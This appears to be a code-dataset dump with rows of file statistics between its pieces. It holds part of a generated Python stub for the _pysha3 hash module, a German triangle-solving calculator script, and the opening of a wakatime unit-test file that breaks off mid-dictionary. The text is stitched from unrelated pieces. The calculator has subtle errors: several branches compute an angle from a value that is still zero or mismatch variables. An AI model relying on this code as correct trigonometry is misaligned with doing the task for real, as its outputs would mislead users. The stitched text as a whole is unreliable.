digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class sha3_384(object):
"""
sha3_384([string]) -> SHA3 object
Return a new SHA3 hash object with a hashbit length of 48 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class sha3_512(object):
"""
sha3_512([string]) -> SHA3 object
Return a new SHA3 hash object with a hashbit length of 64 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class shake_128(object):
"""
shake_128([string]) -> SHAKE object
Return a new SHAKE hash object.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class shake_256(object):
"""
shake_256([string]) -> SHAKE object
Return a new SHAKE hash object.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
# variables with complex values
__loader__ = None # (!) real value is '<_frozen_importlib_external.ExtensionFileLoader object at 0x7fea6112fd30>'
__spec__ = None # (!) real value is "ModuleSpec(name='_pysha3', loader=<_frozen_importlib_external.ExtensionFileLoader object at 0x7fea6112fd30>, origin='/Users/bodayalfaro/PycharmProjects/crypto-keygen-new/venv/lib/python3.8/site-packages/_pysha3.cpython-38-darwin.so')"
| 37.381264
| 271
| 0.651533
| 2,221
| 17,158
| 4.914903
| 0.058532
| 0.164896
| 0.10993
| 0.131916
| 0.947966
| 0.947966
| 0.945218
| 0.933492
| 0.933492
| 0.933492
| 0
| 0.009492
| 0.238664
| 17,158
| 458
| 272
| 37.462882
| 0.82615
| 0.387516
| 0
| 0.926471
| 0
| 0
| 0.008221
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0.294118
| 0
| 0
| 0.637255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
3bd685a14662dcd2bc456a4232ac5e9a07daab6c
| 24,985
|
py
|
Python
|
dreieck-rechner.py
|
FoxtrotSierra6829/dreieck-rechner
|
e091648ed20bf8f664f8d29c2fe156ad0f16c780
|
[
"MIT"
] | null | null | null |
dreieck-rechner.py
|
FoxtrotSierra6829/dreieck-rechner
|
e091648ed20bf8f664f8d29c2fe156ad0f16c780
|
[
"MIT"
] | null | null | null |
dreieck-rechner.py
|
FoxtrotSierra6829/dreieck-rechner
|
e091648ed20bf8f664f8d29c2fe156ad0f16c780
|
[
"MIT"
] | null | null | null |
# Copyright (c), 2021, Florian Scheuner
print("***Nicht für schriftliche")
print("Leistungsnachweise zulässig***")
i=1
while i==1:
print("---------------")
print("Dreieck-Rechner")
print("---------------")
import math as m
#ask for given variables
try:
a = float(input("a="))
except:
a=0
try:
b = float(input("b="))
except:
b=0
try:
c=float(input("c="))
except:
c=0
try:
alpha=float(input("α="))
except:
alpha=0
try:
beta=float(input("β="))
except:
beta=0
try:
gamma=float(input("γ="))
except:
gamma=0
#transform into radians
alpha = m.radians(alpha)
beta = m.radians(beta)
gamma = m.radians(gamma)
#look up what we know
query=""
if a>0:
query = query+"a"
if b>0:
query = query+"b"
if c>0:
query = query+"c"
if alpha>0:
query=query+"alpha"
if beta>0:
query=query+"beta"
if gamma>0:
query=query+"gamma"
#look up the answer
print("---------------")
if query=="abcalphabetagamma":
A=0.5*a*b*m.sin(gamma)
print("A=", A)
#1 lenght not given
elif query=="bcalphabetagamma":
a=m.sqrt(b**2+c**2-2*b*c*m.cos(alpha))
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("A=", A)
elif query=="acalphabetagamma":
b=m.sqrt(a**2+c**2-2*a*c*m.cos(beta))
A=0.5*a*b*m.sin(gamma)
print("b=", b)
print("A=", A)
elif query=="abalphabetagamma":
c=m.sqrt(a**2+b**2-2*a*b*m.cos(gamma))
A=0.5*a*b*m.sin(gamma)
print("c=", c)
print("A=", A)
#2 lenghts not given
elif query=="calphabetagamma":
a=m.sin(alpha)*c/m.sin(gamma)
b=m.sin(beta)*c/m.sin(gamma)
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("b=", b)
print("A=", A)
elif query=="balphabetagamma":
a=m.sin(alpha)*b/m.sin(beta)
c=m.sin(gamma)*b/m.sin(beta)
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("c=", c)
print("A=", A)
elif query=="aalphabetagamma":
b=m.sin(beta)*a/m.sin(alpha)
c=m.sin(gamma)*a/m.sin(alpha)
A=0.5*a*b*m.sin(gamma)
print("b=", b)
print("c=", c)
print("A=", A)
#1 angle not given
elif query=="abcbetagamma":
alpha=180-m.degrees(beta)-m.degrees(gamma)
A=0.5*a*b*m.sin(gamma)
print("α=", alpha)
print("A=", A)
elif query=="abcalphagamma":
beta=180-m.degrees(alpha)-m.degrees(gamma)
A=0.5*a*b*m.sin(gamma)
print("β=", beta)
print("A=", A)
elif query=="abcalphabeta":
gamma=180-m.degrees(alpha)-m.degrees(beta)
A=0.5*a*b*m.sin(m.radians(gamma))
print("γ=", gamma)
print("A=", A)
#2 angles not given
elif query=="abcgamma":
if c>=a:
alpha=m.asin(a/c*m.sin(gamma))
if c>=b:
beta=m.asin(b/c*m.sin(gamma))
A=0.5*a*b*m.sin(gamma)
alpha=m.degrees(alpha)
beta=m.degrees(beta)
print("α=", alpha)
print("β=", beta)
print("A=", A)
else:
beta=180-m.degrees(alpha)-m.degrees(gamma)
A=0.5*a*b*m.sin(gamma)
alpha=m.degrees(alpha)
beta=m.degrees(beta)
print("α=", alpha)
print("β=", beta)
print("A=", A)
else:
if c>=b:
beta=m.asin(b/c*m.sin(gamma))
alpha=180-m.degrees(beta)-m.degrees(gamma)
A=0.5*a*b*m.sin(gamma)
alpha=m.degrees(alpha)
beta=m.degrees(beta)
print("α=", alpha)
print("β=", beta)
print("A=", A)
else:
print("Fehler in der Berechnung.")
elif query=="abcbeta":
if b>=a:
alpha=m.asin(a/b*m.sin(beta))
if b>=c:
gamma=m.asin(c/b*m.sin(beta))
A=0.5*a*b*m.sin(gamma)
alpha=m.degrees(alpha)
gamma=m.degrees(gamma)
print("α=", alpha)
print("γ=", gamma)
print("A=", A)
else:
gamma=180-m.degrees(alpha)-m.degrees(beta)
A=0.5*a*b*m.sin(m.radians(gamma))
alpha=m.degrees(alpha)
print("α=", alpha)
print("γ=", gamma)
print("A=", A)
else:
if b>=c:
gamma=m.asin(c/b*m.sin(beta))
alpha=180-m.degrees(beta)-m.degrees(gamma)
A=0.5*a*b*m.sin(gamma)
alpha=m.degrees(alpha)
gamma=m.degrees(gamma)
print("α=", alpha)
print("γ=", gamma)
print("A=", A)
else:
print("Es sind 2 Dreiecke möglich.")
print("Feature wird nicht unterstüzt.")
elif query=="abcalpha":
if a>=b:
beta=m.asin(b/a*m.sin(alpha))
if a>=c:
gamma=m.asin(c/a*m.sin(alpha))
A=0.5*a*b*m.sin(gamma)
beta=m.degrees(beta)
gamma=m.degrees(gamma)
print("β=", beta)
print("γ=", gamma)
print("A=", A)
else:
gamma=180-m.degrees(alpha)-m.degrees(beta)
A=0.5*a*b*m.sin(m.radians(gamma))
beta=m.degrees(beta)
print("β=", beta)
print("γ=", gamma)
print("A=", A)
else:
if a>=c:
gamma=m.asin(c/a*m.sin(alpha))
beta=180-m.degrees(alpha)-m.degrees(gamma)
A=0.5*a*b*m.sin(gamma)
beta=m.degrees(beta)
gamma=m.degrees(gamma)
print("β=", beta)
print("γ=", gamma)
print("A=", A)
else:
print("Es sind 2 Dreiecke möglich.")
print("Feature wird nicht unterstüzt.")
#1 lenght and 1 angle not given
#a not given
elif query=="bcbetagamma":
alpha=180-m.degrees(beta)-m.degrees(gamma)
a=m.sqrt(b**2+c**2-2*b*c*m.cos(m.radians(alpha)))
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("α=", alpha)
print("A=", A)
elif query=="bcalphagamma":
beta=180-m.degrees(alpha)-m.degrees(gamma)
a=m.sqrt(b**2+c**2-2*b*c*m.cos(alpha))
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("β=", beta)
print("A=", A)
elif query=="bcalphabeta":
gamma=180-m.degrees(alpha)-m.degrees(gamma)
a=m.sqrt(b**2+c**2-2*b*c*m.cos(alpha))
A=0.5*a*b*m.sin(m.radians(gamma))
print("a=", a)
print("γ=", gamma)
print("A=", A)
#b not given
elif query=="acbetagamma":
alpha=180-m.degrees(beta)-m.degrees(gamma)
b=m.sqrt(a**2+c**2-2*a*c*m.cos(beta))
A=0.5*a*b*m.sin(gamma)
print("b=", b)
print("α=", alpha)
print("A=", A)
elif query=="acalphagamma":
beta=180-m.degrees(alpha)-m.degrees(gamma)
b=m.sqrt(a**2+c**2-2*a*c*m.cos(m.radians(beta)))
A=0.5*a*b*m.sin(gamma)
print("b=", b)
print("β=", beta)
print("A=", A)
elif query=="acalphabeta":
gamma=180-m.degrees(alpha)-m.degrees(gamma)
b=m.sqrt(a**2+c**2-2*a*c*m.cos(beta))
A=0.5*a*b*m.sin(m.radians(gamma))
print("b=", b)
print("γ=", gamma)
print("A=", A)
#c not given
elif query=="abbetagamma":
alpha=180-m.degrees(beta)-m.degrees(gamma)
c=m.sqrt(a**2+b**2-2*a*b*m.cos(gamma))
A=0.5*a*b*m.sin(gamma)
print("c=", c)
print("α=", alpha)
print("A=", A)
elif query=="abalphagamma":
beta=180-m.degrees(alpha)-m.degrees(gamma)
c=m.sqrt(a**2+b**2-2*a*b*m.cos(gamma))
A=0.5*a*b*m.sin(gamma)
print("c=", c)
print("β=", beta)
print("A=", A)
elif query=="abalphabeta":
gamma=180-m.degrees(alpha)-m.degrees(beta)
c=m.sqrt(a**2+b**2-2*a*b*m.cos(m.radians(gamma)))
A=0.5*a*b*m.sin(m.radians(gamma))
print("c=", c)
print("γ=", gamma)
print("A=", A)
#2 lenghts and 1 angle not given
elif query=="cbetagamma":
alpha=180-m.degrees(beta)-m.degrees(gamma)
a=m.sin(m.radians(alpha))*c/m.sin(gamma)
b=m.sqrt(a**2+c**2-2*a*c*m.cos(beta))
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("b=", b)
print("α=", alpha)
print("A=", A)
elif query=="calphagamma":
beta=180-m.degrees(alpha)-m.degrees(gamma)
b=m.sin(m.radians(beta))*c/m.sin(gamma)
a=m.sqrt(b**2+c**2-2*b*c*m.cos(alpha))
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("b=", b)
print("β=", beta)
print("A=", A)
elif query=="calphabeta":
gamma=180-m.degrees(alpha)-m.degrees(beta)
a=m.sin(alpha)*c/m.sin(m.radians(gamma))
b=m.sqrt(a**2+c**2-2*a*c*m.cos(beta))
A=0.5*a*b*m.sin(m.radians(gamma))
print("a=", a)
print("b=", b)
print("γ=", gamma)
print("A=", A)
elif query=="bbetagamma":
alpha=180-m.degrees(beta)-m.degrees(gamma)
a=m.sin(m.radians(alpha))*b/m.sin(beta)
c=m.sqrt(a**2+b**2-2*a*b*m.cos(gamma))
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("c=", c)
print("α=", alpha)
print("A=", A)
elif query=="balphagamma":
beta=180-m.degrees(alpha)-m.degrees(gamma)
a=m.sin(alpha)*b/m.sin(m.radians(beta))
c=m.sqrt(a**2+b**2-2*a*b*m.cos(gamma))
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("c=", c)
print("β=", beta)
print("A=", A)
elif query=="balphabeta":
gamma=180-m.degrees(alpha)-m.degrees(beta)
c=m.sin(m.radians(gamma))*b/m.sin(beta)
a=m.sqrt(b**2+c**2-2*b*c*m.cos(alpha))
A=0.5*a*b*m.sin(m.radians(gamma))
print("a=", a)
print("c=", c)
print("γ=", gamma)
print("A=", A)
elif query=="abetagamma":
alpha=180-m.degrees(beta)-m.degrees(gamma)
b=m.sin(beta)*a/m.sin(m.radians(alpha))
c=m.sqrt(a**2+b**2-2*a*b*m.cos(gamma))
A=0.5*a*b*m.sin(gamma)
print("b=", b)
print("c=", c)
print("α=", alpha)
print("A=", A)
elif query=="aalphagamma":
beta=180-m.degrees(alpha)-m.degrees(gamma)
b=m.sin(m.radians(beta))*a/m.sin(alpha)
c=m.sqrt(a**2+b**2-2*a*b*m.cos(gamma))
A=0.5*a*b*m.sin(gamma)
print("b=", b)
print("c=", c)
print("β=", beta)
print("A=", A)
elif query=="aalphabeta":
gamma=180-m.degrees(alpha)-m.degrees(beta)
c=m.sin(m.radians(gamma))*a/m.sin(alpha)
b=m.sqrt(a**2+c**2-2*a*c*m.cos(beta))
A=0.5*a*b*m.sin(m.radians(gamma))
print("b=", b)
print("c=", c)
print("γ=", gamma)
print("A=", A)
#3 angles not given
elif query=="abc":
alpha=m.degrees(m.acos((a**2-b**2-c**2)/(-2*b*c)))
beta=m.degrees(m.acos((b**2-a**2-c**2)/(-2*a*c)))
gamma=m.degrees(m.acos((c**2-a**2-b**2)/(-2*a*b)))
A=0.5*a*b*m.sin(m.radians(gamma))
print("α=", alpha)
print("β=", beta)
print("γ=", gamma)
print("A=", A)
#1 lenghts and 2 angles not given
elif query=="bcgamma":
if c>=b:
beta=m.asin(b/c*m.sin(gamma))
alpha=180-m.degrees(beta)-m.degrees(gamma)
a=c/m.sin(gamma)*m.sin(m.radians(alpha))
beta=m.degrees(beta)
A=0.5*a*b*m.sin(gamma)
print("a=", a)
print("α=", alpha)
print("β=", beta)
print("A=", A)
else:
beta=m.asin(b/c*m.sin(gamma))
alpha=180-m.degrees(beta)-m.degrees(gamma)
a=c/m.sin(gamma)*m.sin(m.radians(alpha))
beta=m.degrees(beta)
A=0.5*a*b*m.sin(gamma)
beta2=180-beta
alpha2=180-beta2-m.degrees(gamma)
a2=c/m.sin(gamma)*m.sin(m.radians(alpha2))
A2=0.5*a2*b*m.sin(gamma)
print("Dreieck 1")
print("a=", a)
print("α=", alpha)
print("β=", beta)
print("A=", A)
print("Dreieck 2")
print("a2=", a2)
print("α2=", alpha2)
print("β2=", beta2)
print("A2=", A2)
elif query=="bcbeta":
if b>=c:
gamma=m.asin(c/b*m.sin(beta))
alpha=180-m.degrees(beta)-m.degrees(gamma)
a=c/m.sin(gamma)*m.sin(m.radians(alpha))
A=0.5*a*b*m.sin(gamma)
gamma=m.degrees(gamma)
print("a=", a)
print("α=", alpha)
print("γ=", gamma)
print("A=", A)
else:
gamma=m.asin(c/b*m.sin(beta))
alpha=180-m.degrees(beta)-m.degrees(gamma)
a=c/m.sin(gamma)*m.sin(m.radians(alpha))
A=0.5*a*b*m.sin(gamma)
gamma=m.degrees(gamma)
gamma2=180-gamma
alpha2=180-gamma2-m.degrees(beta)
a2=c/m.sin(gamma)*m.sin(m.radians(alpha2))
A2=0.5*a2*b*m.sin(m.radians(gamma2))
print("Dreieck 1")
print("a=", a)
print("α=", alpha)
print("γ=", gamma)
print("A=", A)
print("Dreieck 2")
print("a2=", a2)
print("α2=", alpha2)
print("γ2=", gamma2)
print("A2=", A2)
elif query=="bcalpha":
a=m.sqrt(b**2+c**2-(2*b*c*m.cos(alpha)))
beta=m.asin(b/a*m.sin(alpha))
gamma=180-m.degrees(alpha)-m.degrees(beta)
A=0.5*a*b*m.sin(m.radians(gamma))
beta=m.degrees(beta)
print("a=", a)
print("β=", beta)
print("γ=", gamma)
print("A=", A)
elif query=="acgamma":
if c>=a:
alpha=m.asin(a/c*m.sin(gamma))
beta=180-m.degrees(alpha)-m.degrees(gamma)
b=c/m.sin(gamma)*m.sin(m.radians(beta))
alpha=m.degrees(alpha)
A=0.5*a*b*m.sin(gamma)
print("b=", b)
print("α=", alpha)
print("β=", beta)
print("A=", A)
else:
alpha=m.asin(a/c*m.sin(gamma))
beta=180-m.degrees(alpha)-m.degrees(gamma)
b=c/m.sin(gamma)*m.sin(m.radians(beta))
alpha=m.degrees(alpha)
A=0.5*a*b*m.sin(gamma)
alpha2=180-alpha
beta2=180-alpha2-m.degrees(gamma)
b2=c/m.sin(gamma)*m.sin(m.radians(beta2))
A2=0.5*a*b2*m.sin(gamma)
print("Dreieck 1")
print("b=", b)
print("α=", alpha)
print("β=", beta)
print("A=", A)
print("Dreieck 2")
print("b2=", b2)
print("α2=", alpha2)
print("β2=", beta2)
print("A2=", A2)
elif query=="acbeta":
b=m.sqrt(a**2+c**2-(2*a*c*m.cos(beta)))
alpha=m.asin(a/b*m.sin(beta))
gamma=180-m.degrees(alpha)-m.degrees(beta)
A=0.5*a*b*m.sin(m.radians(gamma))
alpha=m.degrees(alpha)
print("b=", b)
print("α=", alpha)
print("γ=", gamma)
print("A=", A)
elif query=="acalpha":
if a>=c:
gamma=m.asin(c/a*m.sin(alpha))
beta=180-m.degrees(alpha)-m.degrees(gamma)
b=c/m.sin(gamma)*m.sin(m.radians(beta))
A=0.5*a*b*m.sin(gamma)
gamma=m.degrees(gamma)
print("b=", b)
print("β=", beta)
print("γ=", gamma)
print("A=", A)
else:
gamma=m.asin(c/a*m.sin(alpha))
beta=180-m.degrees(alpha)-m.degrees(gamma)
b=c/m.sin(gamma)*m.sin(m.radians(beta))
A=0.5*a*b*m.sin(gamma)
gamma=m.degrees(gamma)
gamma2=180-gamma
beta2=180-gamma2-m.degrees(alpha)
b2=c/m.sin(gamma)*m.sin(m.radians(beta2))
A2=0.5*a*b2*m.sin(m.radians(gamma2))
print("Dreieck 1")
print("b=", b)
print("β=", beta)
print("γ=", gamma)
print("A=", A)
print("Dreieck 2")
print("b2=", b2)
print("β2=", beta2)
print("γ2=", gamma2)
print("A2=", A2)
elif query=="abgamma":
c=m.sqrt(a**2+b**2-(2*a*b*m.cos(gamma)))
alpha=m.asin(a/c*m.sin(gamma))
beta=180-m.degrees(alpha)-m.degrees(gamma)
A=0.5*a*b*m.sin(gamma)
alpha=m.degrees(alpha)
print("c=", c)
print("α=", alpha)
print("β=", beta)
print("A=", A)
elif query=="abbeta":
if b>=a:
alpha=m.asin(a/b*m.sin(beta))
gamma=180-m.degrees(alpha)-m.degrees(beta)
c=b/m.sin(beta)*m.sin(m.radians(gamma))
A=0.5*a*b*m.sin(m.radians(gamma))
alpha=m.degrees(alpha)
print("c=", c)
print("α=", alpha)
print("γ=", gamma)
print("A=", A)
else:
alpha=m.asin(a/b*m.sin(beta))
gamma=180-m.degrees(alpha)-m.degrees(beta)
c=b/m.sin(beta)*m.sin(m.radians(gamma))
A=0.5*a*b*m.sin(m.radians(gamma))
alpha=m.degrees(alpha)
alpha2=180-alpha
gamma2=180-alpha2-m.degrees(beta)
c2=b/m.sin(beta)*m.sin(m.radians(gamma2))
A2=0.5*a*b*m.sin(m.radians(gamma2))
print("Dreieck 1")
print("c=", c)
print("α=", alpha)
print("γ=", gamma)
print("A=", A)
print("Dreieck 2")
print("c2=", c2)
print("α2=", alpha2)
print("γ2=", gamma2)
print("A2=", A2)
elif query=="abalpha":
if a>=b:
beta=m.asin(b/a*m.sin(alpha))
gamma=180-m.degrees(alpha)-m.degrees(beta)
c=b/m.sin(beta)*m.sin(m.radians(gamma))
A=0.5*a*b*m.sin(m.radians(gamma))
beta=m.degrees(beta)
print("c=", c)
print("β=", beta)
print("γ=", gamma)
print("A=", A)
else:
beta=m.asin(b/a*m.sin(alpha))
gamma=180-m.degrees(alpha)-m.degrees(beta)
c=b/m.sin(beta)*m.sin(m.radians(gamma))
A=0.5*a*b*m.sin(m.radians(gamma))
beta=m.degrees(beta)
beta2=180-beta
gamma2=180-beta2-m.degrees(alpha)
c2=a/m.sin(alpha)*m.sin(m.radians(gamma2))
A2=0.5*a*b*m.sin(m.radians(gamma2))
print("Dreieck 1")
print("c=", c)
print("β=", beta)
print("γ=", gamma)
print("A=", A)
print("Dreieck 2")
print("c2=", c2)
print("β2=", beta2)
print("γ2=", gamma2)
print("A2=", A2)
#2 lenghts and 2 angles not given
elif query=="alphabetagamma":
print("Berechnung nicht möglich.")
print("Dreieck frei skalierbar.")
#3 lenghts and x angles not given
else:
print("Berechnung nicht möglich.")
print("Es werden mindestens 3 Angaben benötigt.")
| 41.09375
| 74
| 0.361417
| 2,969
| 24,985
| 3.041428
| 0.045807
| 0.066002
| 0.044297
| 0.039203
| 0.835437
| 0.816944
| 0.806866
| 0.79258
| 0.747841
| 0.713621
| 0
| 0.038821
| 0.481409
| 24,985
| 607
| 75
| 41.16145
| 0.6581
| 0.01625
| 0
| 0.798599
| 0
| 0
| 0.055825
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001751
| 0
| 0.001751
| 0.397548
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3bd75fca98539a3200164491e96e52f39cadb2f5
| 14,993
|
py
|
Python
|
Assets/MyAssets/WakaTime/client/tests/test_main.py
|
BillScott1024/WhiteBlocks
|
46c8373a4709c5a8a83a7b3da6b6bf7d3f9a37a5
|
[
"MIT"
] | null | null | null |
Assets/MyAssets/WakaTime/client/tests/test_main.py
|
BillScott1024/WhiteBlocks
|
46c8373a4709c5a8a83a7b3da6b6bf7d3f9a37a5
|
[
"MIT"
] | null | null | null |
Assets/MyAssets/WakaTime/client/tests/test_main.py
|
BillScott1024/WhiteBlocks
|
46c8373a4709c5a8a83a7b3da6b6bf7d3f9a37a5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from wakatime.main import execute
from wakatime.packages import requests
import os
import time
import sys
from wakatime.compat import u
from wakatime.packages.requests.models import Response
from . import utils
try:
from .packages import simplejson as json
except (ImportError, SyntaxError):
import json
try:
from mock import ANY
except ImportError:
from unittest.mock import ANY
class BaseTestCase(utils.TestCase):
patch_these = [
'wakatime.packages.requests.adapters.HTTPAdapter.send',
'wakatime.offlinequeue.Queue.push',
['wakatime.offlinequeue.Queue.pop', None],
'wakatime.session_cache.SessionCache.save',
'wakatime.session_cache.SessionCache.delete',
['wakatime.session_cache.SessionCache.get', requests.session],
]
def test_help_contents(self):
args = ['--help']
with self.assertRaises(SystemExit):
execute(args)
expected_stdout = open('tests/samples/output/test_help_contents').read()
self.assertEquals(sys.stdout.getvalue(), expected_stdout)
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
def test_argument_parsing(self):
response = Response()
response.status_code = 201
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
entity = 'tests/samples/codefiles/twolinefile.txt'
config = 'tests/samples/configs/sample.cfg'
args = ['--file', entity, '--key', '123', '--config', config]
retval = execute(args)
self.assertEquals(retval, 0)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()
def test_missing_config_file(self):
config = 'foo'
entity = 'tests/samples/codefiles/emptyfile.txt'
args = ['--file', entity, '--config', config]
with self.assertRaises(SystemExit):
execute(args)
expected_stdout = u("Error: Could not read from config file foo\n")
expected_stderr = open('tests/samples/output/test_missing_config_file').read()
self.assertEquals(sys.stdout.getvalue(), expected_stdout)
self.assertEquals(sys.stderr.getvalue(), expected_stderr)
self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()
def test_config_file(self):
response = Response()
response.status_code = 201
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
entity = 'tests/samples/codefiles/emptyfile.txt'
config = 'tests/samples/configs/sample.cfg'
args = ['--file', entity, '--config', config]
retval = execute(args)
self.assertEquals(retval, 0)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_called_once_with(ANY)
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_called_once_with()
def test_bad_config_file(self):
entity = 'tests/samples/codefiles/emptyfile.txt'
config = 'tests/samples/configs/bad_config.cfg'
args = ['--file', entity, '--config', config]
retval = execute(args)
self.assertEquals(retval, 103)
self.assertIn('ParsingError', sys.stdout.getvalue())
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.get'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_not_called()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
def test_non_hidden_filename(self):
response = Response()
response.status_code = 0
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
now = u(int(time.time()))
entity = 'tests/samples/codefiles/twolinefile.txt'
config = 'tests/samples/configs/sample.cfg'
args = ['--file', entity, '--key', '123', '--config', config, '--time', now]
retval = execute(args)
self.assertEquals(retval, 102)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': 2,
'entity': os.path.abspath(entity),
'project': os.path.basename(os.path.abspath('.')),
'branch': os.environ.get('TRAVIS_COMMIT', ANY),
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
